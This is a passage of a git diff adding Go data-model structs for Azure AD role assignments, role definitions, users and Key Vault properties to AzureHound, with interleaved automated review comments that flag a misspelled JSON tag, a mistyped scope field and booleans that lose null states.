+ // Identifier of the app-specific scope when the assignment scope is app-specific.
+ // Either this property or directoryScopeId is required.
+ // App scopes are scopes that are defined and understood by this application only.
+ //
+ // Use / for tenant-wide app scopes.
+ // Use directoryScopeId to limit the scope to particular directory objects, for example, administrative units.
+ //
+ // Supports $filter (eq, in).
+ AppScopeId string `json:"appScopeId,omitempty"`
+
+ // Referencing the assigned principal.
+ // Read-only.
+ // Supports $expand.
+ Principal json.RawMessage `json:"principal,omitempty"`
+
+ // The roleDefinition the assignment is for.
+ // Supports $expand. roleDefinition.Id will be auto expanded.
+ RoleDefinition UnifiedRoleDefinition `json:"roleDefinition,omitempty"`
+
+ // The directory object that is the scope of the assignment.
+ // Read-only.
+ // Supports $expand.
+ DirectoryScope Application `json:"directoryScope,omitempty"`
+
+ // Read-only property with details of the app specific scope when the assignment scope is app specific.
+ // Containment entity.
+ // Supports $expand.
+ AppScope AppScope `json:"appScope,omitempty"`
+}
diff --git a/models/azure/unified_role_definition.go b/models/azure/unified_role_definition.go
new file mode 100644
index 0000000..1f12ec4
--- /dev/null
+++ b/models/azure/unified_role_definition.go
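Review bot: In unified_role_assignment.go, `DirectoryScope` is typed as `Application`, although its own comment calls it "the directory object that is the scope of the assignment" and the `AppScopeId` comment names administrative units as possible directory scopes. encoding/json ignores unknown fields, so a scope that is not an application would decode without error into a mostly empty `Application` and the real scope details would be lost. `Principal` already avoids this by using `json.RawMessage`; declaring `DirectoryScope json.RawMessage` with the same tag would keep the payload intact, though that change touches callers outside this hunk. The `RoleDefinitionId` comment also has a typo, `$filer` for `$filter`.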
@@ -0,0 +1,62 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type UnifiedRoleDefinition struct {
+ Entity
+
+ // The description for the unifiedRoleDefinition.
+ // Read-only when isBuiltIn is true.
+ Description string `json:"description,omitempty"`
+
+ // The display name for the unifiedRoleDefinition.
+ // Read-only when isBuiltIn is true.
+ // Required.
+ // Supports $filter (eq, in).
+ DisplayName string `json:"displayName,omitempty"`
+
+ // Flag indicating whether the role definition is part of the default set included in
+ // Azure Active Directory (Azure AD) or a custom definition.
+ // Read-only.
+ // Supports $filter (eq, in).
+ IsBuiltIn bool `json:"isBuiltIn,omitempty"`
+
+ // Flag indicating whether the role is enabled for assignment.
+ // If false the role is not available for assignment.
+ // Read-only when isBuiltIn is true.
+ IsEnabled bool `json:"isEnabled,omitempty"`
+
+ // List of the scopes or permissions the role definition applies to.
+ // Currently only / is supported.
+ // Read-only when isBuiltIn is true.
+ // DO NOT USE. This will be deprecated soon. Attach scope to role assignment.
+ ResourceScopes []string `json:"resourceScopes,omitempty"`
+
+ // List of permissions included in the role.
+ // Read-only when isBuiltIn is true.
+ // Required.
+ RolePermisions []UnifiedRolePermission `json:"rolePermisions,omitempty"`
+
+ // Custom template identifier that can be set when isBuiltIn is false but is read-only when isBuiltIn is true.
+ // This identifier is typically used if one needs an identifier to be the same across different directories.
+ TemplateId string `json:"templateId,omitempty"`
+
+ // Indicates version of the role definition.
+ // Read-only when isBuiltIn is true.
+ Version string `json:"version,omitempty"`
+}
diff --git a/models/azure/unified_role_permission.go b/models/azure/unified_role_permission.go
new file mode 100644
index 0000000..c60b1e9
--- /dev/null
+++ b/models/azure/unified_role_permission.go
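Review bot: In unified_role_definition.go the tag `json:"rolePermisions,omitempty"` is misspelled with a single `s`, while the example payload in the unified_role_permission.go comment later in this patch spells the key `rolePermissions`. encoding/json matches keys case-insensitively but not across spellings, so the array is never decoded and every role definition will appear to carry no permissions, which makes any privilege analysis built on it wrong without raising an error. Correct the tag to `json:"rolePermissions,omitempty"`. The Go field name `RolePermisions` has the same typo, but renaming it affects callers outside this hunk, so that rename should be made together with them.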
@@ -0,0 +1,71 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Represents a collection of allowed resource actions and the conditions that must be met for the action to be allowed.
+// Resource actions are tasks that can be performed on a resource. For example, an application resource may support
+// create, update, delete, and reset password actions.
+type UnifiedRolePermission struct {
+ // Set of tasks that can be performed on a resource.
+ // Required.
+ //
+ // The following is the schema for resource actions:
+ // ///
+ //
+ // For example: microsoft.directory/applications/credentials/update.
+ //
+ // * Namespace - The services that exposes the task. For example, all tasks in Azure Active Directory use the namespace microsoft.directory.
+ // * Entity - The logical features or components exposed by the service in Microsoft Graph. For example, applications, servicePrincipals, or groups.
+ // * PropertySet - The specific properties or aspects of the entity for which access is being granted. For example, microsoft.directory/applications/authentication/read grants the ability to read the reply URL, logout URL, and implicit flow property on the application object in Azure AD. The following are reserved names for common property sets:
+ // * allProperties - Designates all properties of the entity, including privileged properties. Examples include microsoft.directory/applications/allProperties/read and microsoft.directory/applications/allProperties/update.
+ // * basic - Designates common read properties but excludes privileged ones. For example, microsoft.directory/applications/basic/update includes the ability to update standard properties like display name.
+ // * standard - Designates common update properties but excludes privileged ones. For example, microsoft.directory/applications/standard/read.
+ // * Actions - The operations being granted. In most circumstances, permissions should be expressed in terms of CRUD or allTasks. Actions include:
+ // * Create - The ability to create a new instance of the entity.
+ // * Read - The ability to read a given property set (including allProperties).
+ // * Update - The ability to update a given property set (including allProperties).
+ // * Delete - The ability to delete a given entity.
+ // * AllTasks - Represents all CRUD operations (create, read, update, and delete).
+ AllowedResourceActions []string `json:"allowedResourceActions,omitempty"`
+
+ // Optional constraints that must be met for the permission to be effective.
+ //
+ // Conditions define constraints that must be met. For example, a requirement that the principal be an owner of the
+ // target resource. The following are the supported conditions:
+ //
+ // Self: "@Subject.objectId == @Resource.objectId"
+ // Owner: "@Subject.objectId Any_of @Resource.owners"
+ //
+ // The following is an example of a role permission with a condition that the principal be the owner of the target
+ // resource:
+ //
+ // "rolePermissions": [
+ // {
+ // "allowedResourceActions": [
+ // "microsoft.directory/applications/basic/update",
+ // "microsoft.directory/applications/credentials/update"
+ // ],
+ // "condition": "@Subject.objectId Any_of @Resource.owners"
+ // }
+ // ]
+ Condition string `json:"condition,omitempty"`
+
+ // Set of tasks tat may not be performed on a resource. Not yet supported.
+ // See AllowedResourceActions for more information.
+ ExcludedResourceActions []string `json:"excludedResourceActions,omitempty"`
+}
diff --git a/models/azure/user.go b/models/azure/user.go
new file mode 100644
index 0000000..301b5d7
--- /dev/null
+++ b/models/azure/user.go
@@ -0,0 +1,467 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Represents an Azure Active Directory user account. +type User struct { + DirectoryObject + + // A freeform text entry field for the user to describe themselves. + // + // Returned only on `$select` + AboutMe string `json:"aboutMe,omitempty"` + + // `true` if the account is enabled; otherwise `false`. This property is required when a user is created. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + AccountEnabled bool `json:"accountEnabled,omitempty"` + + // Sets the age group of the user. + // + // Allowed values: `null`, `minor`, `notAdult` and `adult` + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + AgeGroup enums.AgeGroup `json:"ageGroup,omitempty"` + + // The licenses that are assigned to the user, including inherited (group-based) licenses. + // + // Not nullable + // Returned only on `$select` + // Supports `$filter` (eq, NOT) + AssignedLicenses []AssignedLicense `json:"assignedLicenses,omitempty"` + + // The plans that are assigned to the user. 
+ // + // Read-Only + // Not Nullable + // Returned only on `$select` + // Supports `$filter` (eq, NOT) + AssignedPlans []AssignedPlan `json:"assignedPlans,omitempty"` + + // The birthday of the user using ISO 8601 format. + // + // Returned only on `$select` + Birthday string `json:"birthday,omitempty"` + + // The telephone numbers for the user. + // Note: Although this is a string collection, only one number can be set for this property. + // + // Read-only for users synced from on-premises directory + // Supports `$filter` (eq, NOT) + BusinessPhones []string `json:"businessPhones,omitempty"` + + // The city in which the user is located. + // + // Max length is 128 characters + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + City string `json:"city,omitempty"` + + // The company name which the user is associated. Useful for describing a company for an external user. + // + // Max length is 64 characters + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + CompanyName string `json:"companyName,omitempty"` + + // Sets whether conset has been obtained for minors. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + ConsentProvidedForMinor enums.ConsentForMinor `json:"consentProvidedForMinor,omitempty"` + + // The country/region in which the user is located. + // + // Max length is 128 characters + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + Country string `json:"country,omitempty"` + + // The created date of the user object. + // + // Read-only + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in) + CreatedDateTime string `json:"createdDateTime,omitempty"` + + // Indicates the method through which the user account was created. 
+ // + // Read-only + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + CreationType enums.CreationType `json:"creationType,omitempty"` + + // The date and time the user was deleted. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in) + DeletedDateTime string `json:"deletedDateTime,omitempty"` + + // The name for the department in which the user works. + // + // Max length is 64 characters + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in) + Department string `json:"department,omitempty"` + + // The name displayed in the address book for the user. This is usually the combination of the user's first name, + // middle initial and last name. Required on creation and cannot be cleared during updates. + // + // Max length is 256 characters + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith), `$orderBy` and `$search` + DisplayName string `json:"displayName,omitempty"` + + // The data and time the user was hired or will start work in case of a future hire. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in) + EmployeeHireDate string `json:"employeeHireDate,omitempty"` + + // The employee identifier assigned to the user bu the organization. + // + // Returned only on `$select` + // Supports `filter` (eq,ne,NOT,ge,le,in,startsWith) + EmployeeId string `json:"employeeId,omitempty"` + + // Represents organization data (e.g. division and costCenter) associated with a user. + // + // Returned only in `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in) + EmployeeOrgData EmployeeOrgData `json:"employeeOrgData,omitempty"` + + // Captures enterprise worker type. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + EmployeeType string `json:"employeeType,omitempty"` + + // For an external user invited to the tenant, this represents the invited user's invitation status. 
+ // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + ExternalUserState enums.ExternalUserState `json:"externalUserState,omitempty"` + + // Shows the timestamp for the latest change to the {@link ExternalUserState} property. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,in) + ExternalUserStateChangeDateTime string `json:"externalUserStateChangeDateTime,omitempty"` + + // The fax number of the user. + // + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + FaxNumber string `json:"faxNumber,omitempty"` + + // The given name (first name) of the user. + // + // Max length is 64 characters + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + GivenName string `json:"givenName,omitempty"` + + // The hire date of the user using ISO 8601 format. + // Note: This property is specific to SharePoint Online. Use {@link EmployeeHireDate} to set or update. + // + // Returned only on `$select` + HireDate string `json:"hireDate,omitempty"` + + // Represents the identities that can be used to sign in to this user account. + // + // Returned only on `$select` + // Supports `$filter` (eq) only where the SignInType is not `userPrincipalName` + Identities []ObjectIdentity `json:"identities,omitempty"` + + // The instant message voice over IP (VOIP) session initiation protocol (SIP) addresses for this user. + // + // Read-only + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,startsWith) + ImAddresses []string `json:"imAddresses,omitempty"` + + // A list for the user to describe their interests. + // + // Returned only on `$select` + Interests []string `json:"interests,omitempty"` + + // The user's job title. 
+ // + // Max length is 128 characters + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + JobTitle string `json:"jobTitle,omitempty"` + + // The time when this Azure AD user last changed their password or when their password was created using ISO 8601 + // format in UTC time. + // + // Returned only on `$select` + LastPasswordChangeDateTime string `json:"lastPasswordChangeDateTime,omitempty"` + + // Used by enterprise applications to determine the legal age group of the user. + // + // Returned only on `$select` + LegalAgeGroupClassification enums.LegalAgeGroup `json:"legalAgeGroupClassification,omitempty"` + + // State of license assignments for this user. + // + // Read-only + // Returned only on `$select` + LicenseAssignmentStates []LicenseAssignmentState `json:"licenseAssignmentStates,omitempty"` + + // The SMTP address for the user. + // + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith,endsWith) + Mail string `json:"mail,omitempty"` + + // Settings for the primary mailbox of the signed-in user. + // + // Returned only on `$select` + MailboxSettings MailboxSettings `json:"mailboxSettings,omitempty"` + + // The mail alias for the user. + // + // Max length is 64 characters + // Returned only on `$select` + // Supports `$filter` (eq,ne,NOT,ge,le,in,startsWith) + MailNickname string `json:"mailNickname,omitempty"` + + // The primary cellular telephone number for the user. Read-only for users synced from on-premises directory. + // Maximum length is 64 characters. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + MobilePhone string `json:"mobilePhone,omitempty"` + + // The URL for the user's personal site. + // Returned only on $select. + MySite string `json:"mySite,omitempty"` + + // The office location in the user's place of business. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). 
+ OfficeLocation string `json:"officeLocation,omitempty"` + + // Contains the on-premises Active Directory distinguished name or DN. The property is only populated for customers + // who are synchronizing their on-premises directory to Azure Active Directory via Azure AD Connect. + // Read-only. + // Returned only on $select. + OnPremisesDistinguishedName string `json:"onPremisesDistinguishedName,omitempty"` + + // Contains the on-premises domainFQDN, also called dnsDomainName synchronized from the on-premises directory. + // The property is only populated for customers who are synchronizing their on-premises directory to Azure Active + // Directory via Azure AD Connect. + // Read-only. + // Returned only on $select. + OnPremisesDomainName string `json:"onPremisesDomainName,omitempty"` + + // Contains extensionAttributes 1-15 for the user + // Note that the individual extension attributes are neither selectable nor filterable. + // For an onPremisesSyncEnabled user, the source of authority for this set of properties is the on-premises and is + // read-only. + // For a cloud-only user (where onPremisesSyncEnabled is false), these properties may be set during creation or + // update. These extension attributes are also known as Exchange custom attributes 1-15. + // Returned only on $select. Supports $filter (eq, NOT, ge, le, in). + OnPremisesExtensionAttributes OnPremisesExtensionAttributes `json:"onPremisesExtensionAttributes,omitempty"` + + // This property is used to associate an on-premises Active Directory user account to their Azure AD user object. + // This property must be specified when creating a new user account in the Graph if you are using a federated domain + // for the user's userPrincipalName (UPN) property. + // NOTE: The $ and _ characters cannot be used when specifying this property. + // Returned only on $select. 
+ // Supports $filter (eq, ne, NOT, ge, le, in) + OnPremisesImmutableId string `json:"onPremisesImmutableId,omitempty"` + + // Indicates the last time at which the object was synced with the on-premises directory; + // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Read-only. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in). + OnPremisesLastSyncDateTime string `json:"onPremisesLastSyncDateTime,omitempty"` + + // Errors when using Microsoft synchronization product during provisioning. + // Returned only on $select. Supports $filter (eq, NOT, ge, le). + OnPremisesProvisioningErrors []OnPremisesProvisioningError `json:"onPremisesProvisioningErrors,omitempty"` + + // Contains the on-premises samAccountName synchronized from the on-premises directory. + // The property is only populated for customers who are synchronizing their on-premises directory to Azure Active + // Directory via Azure AD Connect. + // Read-only. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + OnPremisesSamAccountName string `json:"onPremisesSamAccountName,omitempty"` + + // Contains the on-premises security identifier (SID) for the user that was synchronized from on-premises to the + // cloud. + // Read-only. + // Returned only on $select. + OnPremisesSecurityIdentifier string `json:"onPremisesSecurityIdentifier,omitempty"` + + // true if this object is synced from an on-premises directory; false if this object was originally synced from an + // on-premises directory but is no longer synced; null if this object has never been synced from an on-premises + // directory (default). + // Read-only. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, in). 
+ OnPremisesSyncEnabled bool `json:"onPremisesSyncEnabled,omitempty"` + + // Contains the on-premises userPrincipalName synchronized from the on-premises directory. + // The property is only populated for customers who are synchronizing their on-premises directory to Azure Active + // Directory via Azure AD Connect. + // Read-only. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + OnPremisesUserPrincipalName string `json:"onPremisesUserPrincipalName,omitempty"` + + // A list of additional email addresses for the user; for example: ["bob@contoso.com", "Robert@fabrikam.com"]. + // NOTE: This property cannot contain accent characters. + // Returned only on $select. + // Supports $filter (eq, NOT, ge, le, in, startsWith). + OtherMails []string `json:"otherMails,omitempty"` + + // Specifies password policies for the user. This value is an enumeration with one possible value being + // DisableStrongPassword, which allows weaker passwords than the default policy to be specified. + // DisablePasswordExpiration can also be specified. + // The two may be specified together; for example: DisablePasswordExpiration, DisableStrongPassword. + // Returned only on $select. + // Supports $filter (ne, NOT). + PasswordPolicies string `json:"passwordPolicies,omitempty"` + + // Specifies the password profile for the user. + // The profile contains the user’s password. This property is required when a user is created. The password in the + // profile must satisfy minimum requirements as specified by the passwordPolicies property. By default, a strong + // password is required. + // + // NOTE: For Azure B2C tenants, the forceChangePasswordNextSignIn property should be set to false and instead use + // custom policies and user flows to force password reset at first logon. See Force password reset at first logon. + // + // Returned only on $select. + // Supports $filter (eq, ne, NOT, in). 
+ PasswordProfile PasswordProfile `json:"passwordProfile,omitempty"` + + // A list for the user to enumerate their past projects. + // Returned only on $select. + PastProjects []string `json:"pastProjects,omitempty"` + + // The postal code for the user's postal address. The postal code is specific to the user's country/region. In the + // United States of America, this attribute contains the ZIP code. + // Maximum length is 40 characters. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + PostalCode string `json:"postalCode,omitempty"` + + // The preferred data location for the user. + PreferredDataLocation string `json:"preferredDataLocation,omitempty"` + + // The preferred language for the user. Should follow ISO 639-1 Code; for example en-US. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith) + PreferredName string `json:"preferredName,omitempty"` + + // The plans that are provisioned for the user. + // Read-only. + // Not nullable. + // Returned only on $select. + // Supports $filter (eq, NOT, ge, le). + ProvisionedPlans []ProvisionedPlan `json:"provisionedPlans,omitempty"` + + // For example: ["SMTP: bob@contoso.com", "smtp: bob@sales.contoso.com"]. + // For Azure AD B2C accounts, this property has a limit of ten unique addresses. + // Read-only, + // Not nullable. + // Returned only on $select. + // Supports $filter (eq, NOT, ge, le, startsWith). + ProxyAddresses []string `json:"proxyAddresses,omitempty"` + + // Any refresh tokens or sessions tokens (session cookies) issued before this time are invalid, and applications + // will get an error when using an invalid refresh or sessions token to acquire a delegated access token (to access + // APIs such as Microsoft Graph). If this happens, the application will need to acquire a new refresh token by + // making a request to the authorize endpoint. + // Returned only on $select. + // Read-only. 
+ RefreshTokensValidFromDateTime string `json:"refreshTokensValidFromDateTime,omitempty"` + + // A list for the user to enumerate their responsibilities. + // Returned only on $select + Responsibilities []string `json:"responsibilities,omitempty"` + + // A list for the user to enumerate the schools they have attended. + // Returned only on $select. + Schools []string `json:"schools,omitempty"` + + // true if the Outlook global address list should contain this user, otherwise false. If not set, this will be + // treated as true. For users invited through the invitation manager, this property will be set to false. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, in). + ShowInAddressList bool `json:"showInAddressList,omitempty"` + + // A list for the user to enumerate their skills. + // Returned only on $select. + Skills []string `json:"skills,omitempty"` + + // Any refresh tokens or sessions tokens (session cookies) issued before this time are invalid, and applications + // will get an error when using an invalid refresh or sessions token to acquire a delegated access token (to access + // APIs such as Microsoft Graph). If this happens, the application will need to acquire a new refresh token by + // making a request to the authorize endpoint. + // Read-only. + // Returned only on $select. + SignInSessionsValidFromDateTime string `json:"signInSessionsValidFromDateTime,omitempty"` + + // The state or province in the user's address. + // Maximum length is 128 characters. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + State string `json:"state,omitempty"` + + // The street address of the user's place of business. + // Maximum length is 1024 characters. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + StreetAddress string `json:"streetAddress,omitempty"` + + // The user's surname (family name or last name). Maximum length is 64 characters. 
+ // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + Surname string `json:"surname,omitempty"` + + // A two letter country code (ISO standard 3166). Required for users that will be assigned licenses due to legal + // requirement to check for availability of services in countries. Examples include: US, JP, and GB. + // Not nullable. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + UsageLocation string `json:"usageLocation,omitempty"` + + // The user principal name (UPN) of the user. + // The UPN is an Internet-style login name for the user based on the Internet standard RFC 822. By convention, this + // should map to the user's email name. The general format is alias@domain, where domain must be present in the + // tenant's collection of verified domains. This property is required when a user is created. The verified domains + // for the tenant can be accessed from the verifiedDomains property of organization. + // + // NOTE: This property cannot contain accent characters. + // + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith, endsWith) and $orderBy. + UserPrincipalName string `json:"userPrincipalName,omitempty"` + + // A string value that can be used to classify user types in your directory, such as Member and Guest. + // Returned only on $select. + // Supports $filter (eq, ne, NOT, in). + UserType string `json:"userType,omitempty"` +} diff --git a/models/azure/user_assigned_identity.go b/models/azure/user_assigned_identity.go new file mode 100644 index 0000000..2439cf4 --- /dev/null +++ b/models/azure/user_assigned_identity.go 
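Review bot: In models/azure/user.go, `AccountEnabled`, `OnPremisesSyncEnabled` and `ShowInAddressList` are plain `bool` fields tagged `omitempty`, so a `false` value, a null and a property that was never requested through `$select` all decode to `false` and are all dropped again on encoding. The field comments themselves describe more than two states: `OnPremisesSyncEnabled` documents true/false/null, and `ShowInAddressList` is treated as true when unset. For `AccountEnabled`, a consumer of the collected JSON cannot tell a disabled account from one whose property was simply not returned. Declaring them as pointers keeps the distinction, for example `AccountEnabled *bool` with the tag unchanged. The same applies to the `Enable*` and `EnabledFor*` flags of `VaultProperties` in models/azure/vault_props.go, where the comment on `EnableSoftDelete` says an unset value defaults to true.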
@@ -0,0 +1,23 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type UserAssignedIdentity struct {
+ ClientId string `json:"clientId,omitempty"`
+ PrincipalId string `json:"principalId,omitempty"`
+}
diff --git a/models/azure/vault_certificate.go b/models/azure/vault_certificate.go
new file mode 100644
index 0000000..41c9124
--- /dev/null
+++ b/models/azure/vault_certificate.go
@@ -0,0 +1,44 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes a single certificate reference in a Key Vault, and where the certificate should reside on the VM.
+type VaultCertificate struct {
+ // For Windows VMs, specifies the certificate store on the Virtual Machine to which the certificate should be added.
+ // The specified certificate store is implicitly in the LocalMachine account.
+ // For Linux VMs, the certificate file is placed under the /var/lib/waagent directory, with the file name
+ // .crt for the X509 certificate file and .prv for private key.
+ // Both of these files are .pem formatted.
+ CertificateStore string `json:"certificateStore,omitempty"`
+
+ // This is the URL of a certificate that has been uploaded to Key Vault as a secret.
+ // For adding a secret to the Key Vault, see Add a key or secret to the key vault. In this case, your certificate
+ // needs to be It is the Base64 encoding of the following JSON Object which is encoded in UTF-8:
+ //
+ // ```json
+ // {
+ // "data":"",
+ // "dataType":"pfx",
+ // "password":""
+ // }
+ // ```
+ //
+ // To install certificates on a virtual machine it is recommended to use the Azure Key Vault virtual machine
+ // extension for Linux or the Azure Key Vault virtual machine extension for Windows.
+ CertificateUrl string `json:"certificateUrl,omitempty"`
+}
diff --git a/models/azure/vault_props.go b/models/azure/vault_props.go
new file mode 100644
index 0000000..d944473
--- /dev/null
+++ b/models/azure/vault_props.go
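Review bot: The comment on `CertificateUrl` in models/azure/vault_certificate.go contains a fused sentence, "your certificate needs to be It is the Base64 encoding of the following JSON Object", which leaves the required secret format unclear. I would reword that line to `// The secret value must be the Base64 encoding of the following UTF-8 JSON object:`. The file names in the `CertificateStore` comment (".crt", ".prv") and the empty `"data":""` / `"password":""` values read as if angle-bracket placeholders were lost, though that may be an artifact of how this page was rendered and should be checked against the file itself. Because the JSON shown describes a PFX together with its password, a one-line comment stating that this struct carries only the secret's URL and never the secret material would help readers of the collected output.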
@@ -0,0 +1,87 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+// Properties of the vault
+type VaultProperties struct {
+ // An array of 0 to 1024 identities that have access to the key vault. All identities in the array must use the same
+ // tenant ID as the key vault's tenant ID. When createMode is set to recover, access policies are not required.
+ // Otherwise, access policies are required.
+ AccessPolicies []AccessPolicyEntry `json:"accessPolicies,omitempty"`
+
+ // The vault's create mode to indicate whether the vault need to be recovered or not.
+ CreateMode enums.CreateMode `json:"createMode,omitempty"`
+
+ // Property specifying whether protection against purge is enabled for this vault.
+ // Setting this property to true activates protection against purge for this vault and its content - only the
+ // Key Vault service may initiate a hard, irrecoverable deletion.
+ // The setting is effective only if soft delete is also enabled.
+ // Enabling this functionality is irreversible - that is, the property does not accept false as its value.
+ EnablePurgeProtection bool `json:"enablePurgeProtection,omitempty"`
+
+ // Property that controls how data actions are authorized.
+ // When true, the key vault will use Role Based Access Control (RBAC) for authorization of data actions, and the
+ // access policies specified in vault properties will be ignored. When false, the key vault will use the access
+ // policies specified in vault properties, and any policy stored on Azure Resource Manager will be ignored. If null
+ // or not specified, the vault is created with the default value of false.
+ // Note that management actions are always authorized with RBAC.
+ EnableRbacAuthorization bool `json:"enableRbacAuthorization,omitempty"`
+
+ // Property to specify whether the 'soft delete' functionality is enabled for this key vault.
+ // If it's not set to any value(true or false) when creating new key vault, it will be set to true by default.
+ // Once set to true, it cannot be reverted to false.
+ EnableSoftDelete bool `json:"enableSoftDelete,omitempty"`
+
+ // Property to specify whether Azure Virtual Machines are permitted to retrieve certificates stored as secrets from
+ // the key vault.
+ EnabledForDeployment bool `json:"enabledForDeployment,omitempty"`
+
+ // Property to specify whether Azure Disk Encryption is permitted to retrieve secrets from the vault and unwrap keys.
+ EnabledForDiskEncryption bool `json:"enabledForDiskEncryption,omitempty"`
+
+ // Property to specify whether Azure Resource Manager is permitted to retrieve secrets from the key vault.
+ EnabledForTemplateDeployment bool `json:"enabledForTemplateDeployment,omitempty"`
+
+ // The resource ID of HSM Pool.
+ HsmPoolResourceId string `json:"hsmPoolResourceId,omitempty"`
+
+ // Rules governing the accessibility of the key vault from specific network locations.
+ NetworkAcls NetworkRuleSet `json:"networkAcls,omitempty"`
+
+ // List of private endpoint connections associated with the key vault.
+ PrivateEndpointConnections []PrivateEndpointConnectionItem `json:"privateEndpointConnections,omitempty"`
+
+ // Provisioning state of the vault.
+ ProvisioningState enums.VaultProvisioningState `json:"provisioningState,omitempty"`
+
+ // SKU details
+ Sku Sku `json:"sku,omitempty"`
+
+ // softDelete data retention days. It accepts >=7 and <=90.
+ SoftDeleteRetentionInDays int `json:"softDeleteRetentionInDays,omitempty"`
+
+ // The Azure Active Directory tenant ID that should be used for authenticating requests to the key vault.
+ TenantId string `json:"tenantId,omitempty"`
+
